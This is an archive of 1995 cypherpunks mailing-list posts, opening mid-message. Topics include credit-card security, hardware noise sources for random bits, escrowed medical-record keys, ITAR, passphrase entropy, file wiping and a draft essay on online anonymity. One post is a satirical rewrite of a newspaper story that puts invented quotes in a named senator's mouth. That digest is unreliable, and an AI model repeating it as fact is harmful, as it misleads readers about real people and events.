The referenced paragraphsdescribe cryptographic hardware, software and
technical data.  Computers in general are not "specifically designed"
as cryptographic equipment.





From vznuri at netcom.com  Wed Nov 15 11:45:37 1995
From: vznuri at netcom.com (Vladimir Z. Nuri)
Date: Thu, 16 Nov 1995 03:45:37 +0800
Subject: credit card conventional wisdom
In-Reply-To: <Pine.HPP.3.91.951115112428.20058C-100000@hawk.twinds.com>
Message-ID: <199511151924.LAA29261@netcom13.netcom.com>



Arley Carter <ac at hawk.twinds.com>

>This may be a stupidly obvious question but..... 
>We could argue until the cows come home, hell freezes over or the Cubs win
>the World Series, what ever comes first ;-) about whether giving your credit
>card number to a waiter or an 800 # clerk is any more or less secure than
>transmitting it encrypted or clear text over a data link.
>

the point of my post was that I AGREE. the only issue is that we should
make internet security as superior as possible regardless of the security
of credit cards in the real world. I was attacking the line of thought
that goes, "credit card security is already marginal, therefore why 
should anyone try to improve it in cyberspace"? this is circular
reasoning. "why should anyone try to make something more secure when
it is already insecure?"

>
>I have seen no such statement from the Visa/MasterCard/bank consortiums
>regarding who is at risk if my card number is stolen and used in cyberspace.
>When I get a written indemnification from them stating clearly that 
>using my credit card in cyberspace is no different from using in a local
>restaurant, then I see no risk to the user in using the card in cyberspace.

a major point of my post was that even if you think the cost of fraud
is invisible to you, it is not. it is in everyone's interest to reduce
fraud. if you think you are not paying for it now, your are believing
in an illusion. reducing fraud rates will decrease costs for everyone
in the long run. it is true that credit card companies try to localize
the costs to the areas where their risk is higher (for example, higher
interest rates on credit risks, different charges to the merchant
for "card present" vs. "card not present" as indicated by the other 
poster), however I still think it is obvious that these costs are
still distributed over all customers.

this is one of the main illusions I was trying to discredit in my
original post. the thinking goes like this: "so-and-so does not
appear to have any affect on me now, therefore to consider it is
irrelevant." in the case of credit card users, they seem to think,
"I can already cancel any transactions. illicit purchases made when
somebody steals my card in cyberspace are no different". another
line of thinking is, "credit cards are already insecure, so who
cares if people steal them over the internet". all of these are
very specious lines of thought. your own line is, familiarly,
"nothing matters unless it shows up on my own credit card bill" is
again in my opinion an invitation to disaster. you are paying for
the insecurity of credit cards right now, if not to your credit
card company than in slightly increased rates in the goods you buy
(to cover the merchant's cost to the credit card company).

>The risk to the bank and merchant.......Now that is a different matter.
>Credit card usage on the net will never take off until this issue is
>solved to the satisfaction of the bank and the user.  Until this happens
>arguing this issue is like arguing about how many angels can fit on the 
>head of a pin.

part of getting to the point of satisfaction of the bank and user is
improved internet security. another point of my post.






From vvallopp at eniac.seas.upenn.edu  Wed Nov 15 12:13:40 1995
From: vvallopp at eniac.seas.upenn.edu (Vinod Valloppillil)
Date: Thu, 16 Nov 1995 04:13:40 +0800
Subject: credit card conventional wisdom
In-Reply-To: <199511151924.LAA29261@netcom13.netcom.com>
Message-ID: <199511151943.OAA01845@blue.seas.upenn.edu>


> the point of my post was that I AGREE. the only issue is that we should
> make internet security as superior as possible regardless of the security
> of credit cards in the real world. I was attacking the line of thought
> that goes, "credit card security is already marginal, therefore why 
> should anyone try to improve it in cyberspace"? this is circular
> reasoning. "why should anyone try to make something more secure when
> it is already insecure?"
> 

	Precisely.  It reminds me of a talk given by Dr. John McQuilan
(I think it was at one of his High Performance Networks Conferences) where
he said that the big administrative headache for high speed networks vs.
low speed networks was simply the speed with which you could get in 
trouble.....  The analogy holds quite true in physical credit cards vs.
net credit....

------------------------------+-----------------------------------------------
Vinod Valloppillil            | LibertarianismTelecommunicationsFreeMarketEnvi 
Engineering/Wharton           | ronmentalismTechnologyCryptographyElectronicCa
University of Pennsylvania    | shInteractiveTelevisionEconomicsPhilosophyDigi
vvallopp at eniac.seas.upenn.edu | talPrivacyAnarchoCapitalismRuggedIndividualism
------------------------------+-----------------------------------------------





From pmonta at qualcomm.com  Wed Nov 15 12:16:53 1995
From: pmonta at qualcomm.com (Peter Monta)
Date: Thu, 16 Nov 1995 04:16:53 +0800
Subject: Hardware-random-bits interface
In-Reply-To: <199511151905.OAA08439@jekyll.piermont.com>
Message-ID: <199511152003.MAA03762@mage.qualcomm.com>


> > And if one is left with only internal noise, why not simply use a nice
> > clean source like a Zener diode?
> 
> Quite solidly agreed. Internal noise beats external noise, and there
> is no point in using a radio receiver when what you want is internal
> noise.

It may have been misleading to refer to a radio receiver chip:  the
noise generated by the chip will be entirely internal.  It doesn't
depend on any external signal "sneaking in"; the noise comes from
the effective resistance of the first amplifier stage.  Nothing
is being "received", in some sense; it's just a big hunk 'o gain.

A Zener diode would be fine, but the design is a bit more complex,
especially for wide bandwidths---you need to mess with biasing
voltages, speedy op-amps, interface to CMOS, and all that jazz.
You'd need external power (or a DC-DC converter).  I wanted a
super-simple design that people could just plonk down on a PC
board.  Two chips and some bypass capacitors.

Peter






From tms at TIS.COM  Wed Nov 15 12:32:34 1995
From: tms at TIS.COM (Thomas M. Swiss)
Date: Thu, 16 Nov 1995 04:32:34 +0800
Subject: MED_vac
In-Reply-To: <199511151823.NAA02794@hidden-foes.gateway.com>
Message-ID: <199511152004.PAA05104@ziggy.tis.com>



John Young <jya at pipeline.com> writes:
>
>   11-15-95. NYPaper Page One:
>
>   "When Patients' Records Are Commodities for Sale."
>
>      Individual medical records, carrying more sensitive
>      personal information than ever before, are increasingly
>      being gathered and stored by the tens of thousands in
>      commercial databanks maintained by institutions like
>      hospital networks, health maintenance organizations and
>      drug companies. And although there is a Federal law that
>      protects the privacy of video rental lists, private
>      medical information is being bought and sold freely.

     A (possibly stupid) thought: could commercial key escrow help here?

     I very much want hospitals to have fast access to my medical data if
my broken and bleeding body should come through their door, even if I am
unconscious and my personal physician cannot be reached. On the other hand,
I don't want anyone to be snooping through them right now.

     One solution is for me to carry my records around with me on a
smartcard or some such device. But there are problem with that approach;
for example, do I want that personal information to be in my wallet if it's
stolen? Do I want to add another item to the list of physical items I have
to keep secure?

     So, what if my records were available on the net, but encrypted with a
an key known to my physician and an escrow agency? (Equivalently, they
could be on that smartcard, but encrypted.) If an emergency occurs, the
hospital fetches my encrypted records from my physician's server, then
sends a message (signed with the hospital's key) to Keys R Us, the escrow
agent, saying "This is Dr. McCoy at Frobnitz Memorial Hospital, we need the
key for FooBar Medix, Inc., patient number 147258369." (My FooBar Medix,
Inc., insurance card lists my physician's server, the escrow agency, and my
patient number.)  Keys R Us verifies the message and sends the key.
Perhaps there's also an alias to notify of the release, one that reports to
but is not traceable to my physician or me.

    Keys R Us only has a number and a key; they don't know who my physician
is and therefore don't know where to find the actual records.  Anyone who
gets my insurance card can find the records, but has to convince Keys R Us
to release they key; and if I've done my homework in picking the agency,
they won't.

     Does this give an advantage over just having a copy of my records kept
by a trusted third party? Maybe so; I think maybe less trust of the escrow
agency is necessary. No snooper can slip someone at the escrow agency a
couple of cyberbucks to get a copy of my records, unless they've managed to
match "FooBar Medix, Inc. patient number 147258369" with "Tom Swiss" and
the location of my physician's server. (What if FooBar Medix, Inc., lets
this information out? I dunno. I guess I visit their office with a
shotgun. Better idea: FMI doesn't know what escrow agency I use. I fill in
Keys R Us on the card myself.) No minimum wage slave can just casually
browse my records for fun.

     Thoughts?

     [Since TIS is in the CKE field, I should note that this is my own
boneheaded idea, not affiliated with the company in any way.]

-Tom Swiss / tms at tis.com 






From cpunk at remail.ecafe.org  Wed Nov 15 14:04:18 1995
From: cpunk at remail.ecafe.org (ECafe Anonymous Remailer)
Date: Thu, 16 Nov 1995 06:04:18 +0800
Subject: encryption in BeOS kernel
Message-ID: <199511150526.FAA12374@pangaea.ang.ecafe.org>


This also corresponds to IBM's development of its "IPC"
"network appliance" (also due out 1Q '96) to challenge
the desktop PC for Internet use.

It parallels as well IBM's reported work on a "Microkernal"
which may feature encryption, authentication and security
hooks.

IBM's IPC will probably use an Intel chip (WSJ today).

Which leads to speculation:

Would chip-fabbers covertly Fortezza chips to get export ok?

Motorola, HP, IBM, others long-linked to USG are ever ready 
to gobble international market share in the national
interest.

Intel, sure, world-class fab plants planting chip-secrets.

Wonder if that key escrow protest to Gore is a cover for
economic actions authorized by National Security D&D?













From jimbell at pacifier.com  Wed Nov 15 14:13:15 1995
From: jimbell at pacifier.com (jim bell)
Date: Thu, 16 Nov 1995 06:13:15 +0800
Subject: NSA, ITAR, NCSA and plug-in hooks.
Message-ID: <m0tFpbT-0008yaC@pacifier.com>


>jim bell writes:
>>>I think it's 121.1, Category XIII paragraph (b) item (5):
>>>"Ancillary equipment specifically designed or modified for paragraphs (b)
>>>(1), (2), (3), (4) and (5) of this category;"
>>
>>Question:  What makes computers in general NOT describable by such a
>>paragraph?!?
>
>The referenced paragraphsdescribe cryptographic hardware, software and
>technical data.  Computers in general are not "specifically designed"
>as cryptographic equipment.

Great!  Then you must merely ensure that there is at least one
(non-encryption) program around that can use the same hooks.






From rah at shipwright.com  Wed Nov 15 14:22:22 1995
From: rah at shipwright.com (Robert A. Hettinga by way of rah@shipwright.com RobertHettinga)
Date: Thu, 16 Nov 1995 06:22:22 +0800
Subject: Size of the internet economy?
Message-ID: <v02120d00acd0125e6d8b@[199.0.65.105]>


Lately, I heard (somewhere) that $250 million changed hands directly on
the net in 1994, mostly credit cards.

Is this a real number? Where did it come from? What are estimates for 1995?

Cheers,
Bob Hettinga

--
Robert Hettinga <rah at shipwright.com>
e$
44 Farquhar Street
Boston 02131
617-958-3971
"Reality is not Optional" -- Thomas Sowell







From jimbell at pacifier.com  Wed Nov 15 14:28:27 1995
From: jimbell at pacifier.com (jim bell)
Date: Thu, 16 Nov 1995 06:28:27 +0800
Subject: Hardware-random-bits interface
Message-ID: <m0tFpnk-0008yDC@pacifier.com>


>> > And if one is left with only internal noise, why not simply use a nice
>> > clean source like a Zener diode?
>> 
>> Quite solidly agreed. Internal noise beats external noise, and there
>> is no point in using a radio receiver when what you want is internal
>> noise.
>
>It may have been misleading to refer to a radio receiver chip:  the
>noise generated by the chip will be entirely internal.  It doesn't
>depend on any external signal "sneaking in"; the noise comes from
>the effective resistance of the first amplifier stage.  Nothing
>is being "received", in some sense; it's just a big hunk 'o gain.
>
>A Zener diode would be fine, but the design is a bit more complex,
>especially for wide bandwidths---you need to mess with biasing
>voltages, speedy op-amps, interface to CMOS, and all that jazz.
>You'd need external power (or a DC-DC converter).  I wanted a
>super-simple design that people could just plonk down on a PC
>board.  Two chips and some bypass capacitors.

Why not do both?  A Zener is supposed to be a relatively high-level source
of white noise, up to some upper bandwidth, so you could just feed the Zener
voltage (through a blocking cap, if necessary) to the radio receiver input.

See, you and the chip manufacturer are working at crossed purposes:  a radio
receiver chip is SUPPOSED to be a low-noise device.  For your purposes, you
WANT it to be a high-noise device, to minimize the significance of external
noise.  Since the radio receiver chip does some things you want (gain, maybe
AGC), but doesn't necessarily add an adequate amount of noise, a zener would
be an excellent addition.






From ac at hawk.twinds.com  Wed Nov 15 14:48:13 1995
From: ac at hawk.twinds.com (Arley Carter)
Date: Thu, 16 Nov 1995 06:48:13 +0800
Subject: credit card conventional wisdom
In-Reply-To: <199511151924.LAA29261@netcom13.netcom.com>
Message-ID: <Pine.HPP.3.91.951115165438.20268D-100000@hawk.twinds.com>


On Wed, 15 Nov 1995, Vladimir Z. Nuri wrote:

> 
> Arley Carter <ac at hawk.twinds.com>
> 
> >This may be a stupidly obvious question but..... 
> >We could argue until the cows come home, hell freezes over or the Cubs win
> >the World Series, what ever comes first ;-) about whether giving your credit
> >card number to a waiter or an 800 # clerk is any more or less secure than
> >transmitting it encrypted or clear text over a data link.
> >
> 
> the point of my post was that I AGREE. the only issue is that we should
> make internet security as superior as possible regardless of the security
> of credit cards in the real world. I was attacking the line of thought
> that goes, "credit card security is already marginal, therefore why 
> should anyone try to improve it in cyberspace"? this is circular
> reasoning. "why should anyone try to make something more secure when
> it is already insecure?"
> 
In my post I am looking at this from an economics point of view. Simply
put: If there is unlimited liability to the credit card holder because
Mallet is stealing card numbers from the telco switch, encyrpted, plain text,
it doesn't matter, there will no users.  If there are no users then
there will be no transaction fees generated, no transaction fees, then it
won't be deployed.  Therefore, there is no reason to develop the code 
or even read the latest and greatest specs. and we are all wasting out 
time.  

We must recognize that no matter what code we write, how secure it is,
it won't be used until the banks that must clear the transactions
agree to accept the risks of loss in return for their transactions fees.
I haven't seen this from any of this consortiums and would like besides 
publishing their specs for the best system agree that this risk bearing
is a necessary step for electronic commerce to become a reality.

I would like to see members of the MasterCard and Visa coalitions comment 
on this aspect of the systems that are promulgating.  The one who cracks
this nut first without losing their shirt to Mallet will be the winner. The
others that expect us to deploy systems based upon if Mallet breaks the 
system, the cardholder and or merchant pays is wasting our time. 
MasterCard/Visa,  you're going to have to *earn* those transaction fees in
cyberspace.

>From the card holder's point of view all he cares about is that he can't 
lose money from using his card.   

For anybody else that wants to argue about what is more dangerous,
restaurant dumpsters or telco switches, take it to alt.who.the.hell.cares.


Regards:
-arc

Arley Carter
Tradewinds Technologies, Inc.
email: ac at hawk.twinds.com
www: http://www.twinds.com

"Trust me. This is a secure product. I'm from <insert your favorite 
corporation of government agency>."









From stewarts at ix.netcom.com  Wed Nov 15 14:50:48 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Thu, 16 Nov 1995 06:50:48 +0800
Subject: Repeated Words/characters in Password/Phrase
Message-ID: <199511152225.OAA07177@ix5.ix.netcom.com>


>Do repeated words in a PGP passphrase make the pass phrase less secure than
>a passphrase without any repeated words?  And on the same note, do repeated
>letters in a UNIX password make that password easier to break? I can't seem
>to find anything in my books on cryptography that mention this.  Thanks.

As always, it depends on the attacks people can make on your system.
For Unix password files, the cyphertext is often available, the plaintext is
known,
and the key (your password) is known to be eight or fewer characters.  
If there's reasonable suspicion that your password contains multiples of one 
or more characters, and that they're mostly letters, you're toast against a 
good brute-force attack, because the search space is fairly small.
Using, say, a pair of 4-letter words is an even worse idea...

For PGP passphrases, the cyphertext is generally unavailable, but assuming
you're dealing with Bad Guys resourceful enough to try to crack your passphrase,
they've probably got the file.  The plaintext may be partially known (PGP data
files have some structure; RTFM to find out how much) and partially unknown 
(your secret key) but guesses can be validated (slowly).  The structure of the 
IDEA key is that your passphrase is hashed by MD5, and the 128-bit output
used as an IDEA key to encrypt the formatted secret key.  Since brute-forcing
IDEA with the 128-bit MD5 output is unrealistic, the alternative is to feed
candidate keys through the whole process.  So how much entropy does your
passphrase have,
and how many guesses are they willing to attempt?  How much does word-repeating
affect it?  How much entropy depends on your taste in passphrases, your
creativity,
and how much you're willing/able to memorize without resorting to writing it
down.

The MD5 effectively limits entropy to 128 bits, but you can cram as much as
you want
into the passphrase and MD5 will crunch it all down, so repeated words can only
cause problems if they make you decide you've got enough entropy in the
passphrase
before you do.  If your passphrase is "FOO BAR", and you're known to be a
programmer,
lengthening it to "FOO FOO BAR BAR BAR Skidoo" may improve it some, though
it's not
as good as "Eric Woodruff Kintetsu Espada 1145 Lutheran", to pick six words
drawn
randomly from the Tri-Valley phone book.  But if you eliminate obvious material,
and word-doubling lets you pick a more complex passphrase than you might
have otherwise
used, go ahead - it's not going to make the MD5 any more attackable.
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281







From stewarts at ix.netcom.com  Wed Nov 15 14:51:35 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Thu, 16 Nov 1995 06:51:35 +0800
Subject: NSA, ITAR, NCSA and plug-in hooks.
Message-ID: <199511152225.OAA07154@ix5.ix.netcom.com>



>>Does anyone know the ostensible justification for this?  

Isn't the NCSA government-funded?  If so, they've probably got
less slack in what they can get away with than private citizens;
the NSA's got more leverage over their funding, especially if
"Supercomputer Applications" are often military or civilian-govt.
Not only do they have to worry about ITAR as law, they have to
worry about their continued cash flow.
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281







From s1113645 at tesla.cc.uottawa.ca  Wed Nov 15 14:55:49 1995
From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca)
Date: Thu, 16 Nov 1995 06:55:49 +0800
Subject: BBS Generator Code Needed & crypto++
In-Reply-To: <9511141749.AA28423@zip_master2.sbi.com>
Message-ID: <Pine.3.89.9511142310.A14556-0100000@tesla.cc.uottawa.ca>




On Tue, 14 Nov 1995, David Macfarlane wrote:

> Wei Dai's crypto++ has BBS, if you can find a copy.

Try:
(quoting Wei Dai) 

ftp://ftp.csn.net/mpj/I_will_not_export/crypto_?????/libraries/crypto11.zip
 
where ????? is in ftp://ftp.csn.net/mpj/README
 
I encourage people to use this library in commercial as well as 
shareware/freeware products.  You don't have to pay me a cent, but 
don't forget about the patents.






From pcassidy at world.std.com  Wed Nov 15 15:57:25 1995
From: pcassidy at world.std.com (Peter F Cassidy)
Date: Thu, 16 Nov 1995 07:57:25 +0800
Subject: Size of the internet economy?
In-Reply-To: <v02120d00acd0125e6d8b@[199.0.65.105]>
Message-ID: <Pine.3.89.9511151811.C19718-0100000@world.std.com>





On Wed, 15 Nov 1995, Robert A. Hettinga wrote:

> Lately, I heard (somewhere) that $250 million changed hands directly on
> the net in 1994, mostly credit cards. > > Is this a real number? Where
did it come from? What are estimates for 1995? > Everything on the net is
outside of a lot of traditional metrics and hard to authenticate even if
it were simple to measure. Forrester sites 250 million retail and $90
million in content revenues. By contrast, guys selling a piece of pipe
raked in $1.5 billion. 

Activmedia - www.activmedia.com - does regular surveys. I just got a 
breathless press release for their latest one - "WEB COMMERCE UP 1900%." 
Someone must have bought tickets the lastest George Forman comeback fight 
or something from a ticketron on-line kiosk. . . 

Ole,

Peter

> 
> 






From anonymous-remailer at shell.portal.com  Wed Nov 15 16:41:23 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Thu, 16 Nov 1995 08:41:23 +0800
Subject: CSE gets flak on TV
Message-ID: <199511160021.QAA06782@jobe.shell.portal.com>


On Tue, 14 Nov 1995, Mark C. Henderson wrote:

> On Nov 14, 16:47, s1113645 at tesla.cc.uottawa.ca wrote:
>> Subject: CSE gets flak on TV
>> For those who care, the Communications Security Establishment has been
>> getting some flak for spying on Mex. during NAFTA talks and on Korea to
>> help us sell Can. nuke reactors:

The CSE deserves all the flak that it can get ... especially the village
idjit in "LMN Group", Barry de 'Artful.  Gee is he full of it.  His phone
manners are atrocious, especially for someone *supposedly* in customer
relations. 

I mean are these guys on their toes, or what??  I guess he was just trying
to do a bad Lily Tomlin impression, or they're having a really bad day
over there.  My mistake for demonstrating a willingness to talk.  It 
really was a waste of a quarter.

I guess that I'm not supposed to taunt the poor people at the CSE via
STU-III.  I guess I should have used POTS.  I mean Motorola's STU-III
can't be spoofed, can it??  Especially when we go into SECURE MODE?? 

(btw, that's STRIKE THREE to my Ottawa friends ...)

> Folks who are interested in the CSE should also check out the
> "unofficial CSE home page" at

Hmm, I think they mispelled some stuff on this page.  

It's STU-III ... not STY-III ... guess someone's finger slipped up on the
Y and the U, or something.  Then again, maybe we should be specing Alcatel
over Motorola.  Fewer chances for miscommunications. 

Or maybe Motorola has a couple of new products coming out. I'll bet
whatever they are, they ain't Marrons Glaces, or Beaujolais Villages. 



Alice de 'nonymous ...

                                  ...just another one of those...
                                                   ...hunters...

P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.









From Greg_Rose at sibelius.sydney.sterling.com  Wed Nov 15 17:05:50 1995
From: Greg_Rose at sibelius.sydney.sterling.com (Greg ROSE)
Date: Thu, 16 Nov 1995 09:05:50 +0800
Subject: credit card conventional wisdom
In-Reply-To: <9511151659.AA03934@zorch.w3.org>
Message-ID: <9511160031.AA41675@paganini.sydney.sterling.com>



-----BEGIN PGP SIGNED MESSAGE-----

  >No. What Phil is saying is that the magnetic strip contains an extra 
  >group of digits which are only available when the stripe is read, and not 
  >when the card is used for CNP. 

  The extra gigits I was refering to are the ones on the front of the card 
  but not embossed.

Wow, you learn something every day. I've never in
my whole life (well, my American Express life,
over 15 years) noticed those four digits. I've
never been asked for them by anyone, or noticed
them being written down, either. Exactly when and
how are they used?

Greg.

Greg Rose               INTERNET: greg_rose at sydney.sterling.com  
Sterling Software       VOICE:  +61-2-9975 4777    FAX:  +61-2-9975 2921
28 Rodborough Rd.       http://www.sydney.sterling.com:8080/~ggr
French's Forest         35 0A 79 7D 5E 21 8D 47  E3 53 75 66 AC FB D9 45
NSW 2086 Australia.     co-mod sci.crypt.research, USENIX Director.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMKqGSaRQkCwJ0+ZNAQEjlQQAuC4eQWHqvQCy8f07W8F7cQtTkvjq3uya
s2dx3aTyRRNd/pdS3AgdK58asxJPb59xGKj/2PP/7lWahC1ghDxmHv380V5DuRNq
VREIsMjxcmk/X/1NxjN5nGza1imvwj8DlQ8jEuPgk5mNkcyIiyhRuNmQnYdcJkbR
nGb91Eg/+Ss=
=27gx
-----END PGP SIGNATURE-----





From cassiel at alpha.c2.org  Wed Nov 15 17:08:43 1995
From: cassiel at alpha.c2.org (Cassiel)
Date: Thu, 16 Nov 1995 09:08:43 +0800
Subject: No Subject
Message-ID: <199511160025.QAA08644@infinity.c2.org>


Thanks for all who wrote with help re: FAQ file!  I now
have several other sources from which to download the
file.  Looks pretty interesting....

Cassiel







From foodie at netcom.com  Wed Nov 15 17:16:09 1995
From: foodie at netcom.com (foodie at netcom.com)
Date: Thu, 16 Nov 1995 09:16:09 +0800
Subject: Repeated Words/characters in Password/Phrase
Message-ID: <v02130505acd00385c158@DialupEudora>


>In the real world, where passphrases must be memorized, "long and random"
>is an elusive goal, which has to be weighed against the risk of other
                     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>attacks (such as capturing keystrokes with a sofware monitor, or from afar
 ^^^^^^^
>with a van Eyk antenna, etc.).
>
>Me, I use a nonsense phrase which has meaning to me, with a few garbage
>characters added to confuse things further. I don't think my passphrase is
>the weak link.
>
>- --Tim May

This is, of course, very good advice.

Passphrases need only be as strong as every other component of the security
system. I'd add that there is a moderately good reason to keep the passphrase
_only_ as strong as every other component of the system for psychological
reasons.

The passphrase is what the user tends to think of when they think of their
system. Even if that user is the designer of the system, a false sense of
security an be an easy thing to develop. At a past place-of-work, someone
there who prided themselves on using difficult passphrases was bitten pretty
severely by a faulty .forward file.

DES provides similar lessons - searching 56 bits of keyspace requires just
barely less effort than that required to launch other attacks on the algorithm
(in theory, at least). The system is, as far as anybody knows, secure, and no
part of it is significantly more secure than any other.

-j

--
On the internet, nobody knows you're a diety.
_________________________________________________________________
Jamie Lawrence                                <foodie at netcom.com>







From jya at pipeline.com  Thu Nov 16 09:20:45 1995
From: jya at pipeline.com (John Young)
Date: Thu, 16 Nov 95 09:20:45 PST
Subject: NID_otp
Message-ID: <199511161720.MAA17416@pipe3.nyc.pipeline.com>


   11-16-95. Washrag:


   "Pentagon Gaining Turf From the CIA."

      Pentagon agencies and officials are set to play a
      greater role than before in supervising key intelligence
      operations including doctoring spy satellite photos,
      and recruiting then ignoring bumbling agents overseas.
      There's even a proposal in Congress to create a new,
      national intelligence director hiding out in the Office
      of the President (OTP), and supervising nulls with
      equal job-fears at the CIA and Pentagon.

      Sen. Bob Kerrey worries about the trend because "in the
      world of the future, more and more secret garbage would
      not feed my national interest." He cited Deutch's 
proposed
      consolidation of intelligence imagery analysis in a new
      Pentagon-run advert agency, which would swallow up the 
CIA's
      National Photo Interpretation Center along with the
      Defense Department-based Central Exaggeration Office and
      Defense Entrapping Agency. "Clinton, Moynihan and Specter 

      are hogs for slop," Kerrey spat, "I want my rep 
fattened."


   NID_otp  (8 kb)














From cassiel at alpha.c2.org  Wed Nov 15 17:53:17 1995
From: cassiel at alpha.c2.org (Cassiel)
Date: Thu, 16 Nov 1995 09:53:17 +0800
Subject: No Subject
Message-ID: <199511160125.RAA02384@infinity.c2.org>


Hi All

You were all so helpful with my last request, I figured
I would go for broke and ask for more advice.

The physical security of my computer isn't really that great,
so I've been interested in finding utilities that would 
securely delete the files I want deleted (as well as temp
files created, etc.).  I run Win 3.1 on DOS 6.  What do 
people think is the best free/shareware file wiping utility
(now, there's a Freudian name...) out there?  How about for
deleteing that pesky Windows Swapfile?   I know--best of all
worlds I remain in DOS, but this isn't always practical.  Any
advice would be appreciated.

Please cc me directly in your response as I've moved over to
Cypherpunk-lite.

Thanks again!

Cassiel





From hfinney at shell.portal.com  Wed Nov 15 18:07:03 1995
From: hfinney at shell.portal.com (Hal)
Date: Thu, 16 Nov 1995 10:07:03 +0800
Subject: Anonymity and Intellectual Capital
Message-ID: <199511160148.RAA18908@jobe.shell.portal.com>


Here is a draft article by David Post of Georgetown Law Center.  He
offered it on the Cyberia list and it includes permission to
redistribute.  I thought it had some interesting ideas on anonymity and
pseudonymity, as well as our old bugaboo "reputation capital".  I have
reformatted it slightly to improve readability but made no changes to the
content:


Pooling Intellectual Capital: Anonymity, Pseudonymity, and
Contingent
Identity in Cyberspace    

DRAFT OUTLINE
October 31, 1995
David G. Post [NOTE 1]

	  Most discussions of "anonymity" in cyberspace focus on
whether or not to regulate the availability of "untraceably anonymous"
messaging functions -- anonymous remailer services and the like -- and
the related question of how, in the special circumstances of
cyberspace, one might accomplish such regulation).  To be sure, this is
an important perspective; although we are embedded in a world in which
anonymous transactions are pervasive, we have never before been able to
manipulate anonymity, or to undertake as wide a range of anonymous
transactions, as cyberspace allows us to undertake (and we have,
therefore, only begun to think about the implications of being able to
do so).  At the same time, however, the technology offers, it would
seem, new prospects for eliminating anonymous communication, i.e., for
requiring (and enforcing the requirement for) completely "traceable"
communication.

     We need, in the first instance, to understand more about the costs
and benefits of anonymity in this new environment before we can
sensibly talk about the best way to regulate it (or whether to regulate
it at all).  Harms associated with an anonymous messaging  regime
include, notably, the inability of "law enforcement" (broadly defined
to include both public and private enforcement) to obtain information
on persons responsible for harm perpetrated by individual actors;
benefits include the ability of individuals to engage in communicative
activity without putting any aspects of their "identity" at risk (see
below for additional discussion of the reasons for the quotation marks
here).

	  My thesis here is that, because of the close links
between anonymity and pseudonymity in cyberspace, new elements need to
be added to this equation -- primarily on the benefits side.  This
requires disentangling, at the outset, three related concepts:
anonymity, pseudonymity, and traceability.  We can define an
"anonymous" communication as one in which the message itself contains
(and hence the recipient of the message receives) no information
regarding the identity of the sender.[NOTE 2]  Although there can be
truly anonymous messages even in this strict sense -- messages
containing no information about the originator -- it makes more sense
to talk about anonymity as a continuous rather than a binary attribute
(present/absent) of messages:  even messages we ordinarily think of as
"anonymous," after all, contain some information about the author
(e.g., graffiti scrawled on a subway platform informs us that the
author was literate, and was geographically located in a certain place
within the last x months/years, all of which probably effects a
significant reduction in the reader's uncertainty about the identity of
the author by ruling out the vast majority of individuals in the world
as possible authors).

     Messages, however, rarely contain a fixed amount of information
about the sender's identity; [NOTE 3] the degree to which a message may
be considered "anonymous" is rarely (if ever) an inherent
characteristic of the message itself.  Relevant information about the
originator's identity may well often be available, but only at some
additional cost.  For example, an "anonymous" note slipped under the
door may be covered with fingerprints from which, were we able easily
to access both a fingerprint reader and the FBI's fingerprint database,
we could obtain significant information about likely originators.
"Traceabililty" measures the cost of obtaining information about the
identity of the sender in addition to the information that is "readily
apparent" -- i.e., obtainable at (virtually) no cost -- from the
message itself.[NOTE 4]

	  Finally, we can define a pseudonymous message as one
that contains information (of varying reliability, to be sure) about
the identity of the originator -- the cognizable entity responsible for
transmitting the message -- without simultaneously providing
information about the actual, biological, individuals responsible for
transmission of the message.  Pseudonymity, like anonymity, shields
aspects of the identity of the "real" actor from view; information that
a book was written by "Mark Twain" by itself gives you no more (or
less) information about the true identity of the author than does the
information that it was written by "Anon." Indeed, if Samuel Clemens
had chosen to publish each of his novels under a different pseudonym,
that would have been the essential equivalent of publishing all of the
novels under the pseudonym "Anon.," or "John Doe." Pseudonymity allows
each message to carry additional information, cumulative over time,
about the pseudonymous actor; i.e., the difference between pseudonymity
and anonymity is that the former, but not the latter, allows the
accumulation of reputational capital in the pseudonymous entity.  The
use of the a single pseudonym "Mark Twain" allowed Clemens to invest a
single entity with reputational capital, built up over time and across
different novels; "Anon." will not serve that purpose, primarily (if
not exclusively) because it is unprotected and used by any number of
other authors (many of whom might not be quite as talented as
Clemens).[NOTE 5]

	  In other words, pseudonymity, like anonymity, allows
individuals to act without putting at risk any aspects of their own,
personal identity (including their physical assets, reputational
capital, financial capital, and the like); pseudonymity differs,
however, from anonymity in that it allows the accumulation of
reputational capital in the pseudonymous entity.  Both anonymity and
pseudonymity are thus forms of "limited liability," and the extent to
which they serve that function effectively is determined, in both
cases, by whatever traceability requirements are imposed.  To
illustrate, take the extreme case, e.g., a requirement that all
messages contain certain information about specified aspects of the
originator's "identity."  This would not only eliminate anonymous
messages (at least to the extent it could be enforced), but it would
make certain forms of pseudonymity effectively unavailable as well; the
reputational capital belonging to "Mark Twain" and to "Samuel Clemens"
would be identical, and whatever aspects of Clemens' identity had to be
revealed would no longer be shielded in the course of any transactions
in which "Mark Twain" was involved.

     Most discussions of "the regulation of anonymity in cyberspace"
are really discussions about traceability requirements.  The potential
benefits and harms that accompany an anonymous messaging regime are
directly related not to the availability of "anonymity" per se, but to
the availability of untraceable anonymity.  I know of no serious
proposals, for example, to prohibit individuals from leaving their
electronic mail messages unsigned; the hard questions all concern the
nature of the traceability requirements that will be put in place in
regard to those messages, i.e., how easy or difficult will it be for
the recipients of such messages, third parties, or law enforcement
officials, to obtain additional information about the identity of the
message originator.

	  But traceability requirements will have an impact --
possibly a profound impact -- not merely on the availability of
anonymous communication, but on the availability of pseudonymous
communication as well. For example, a sufficiently high degree of
traceability eliminates both anonymous and pseudonymous messages;
requiring all authors to provide information about their "real"
identity not only makes it impossible for them to communicate
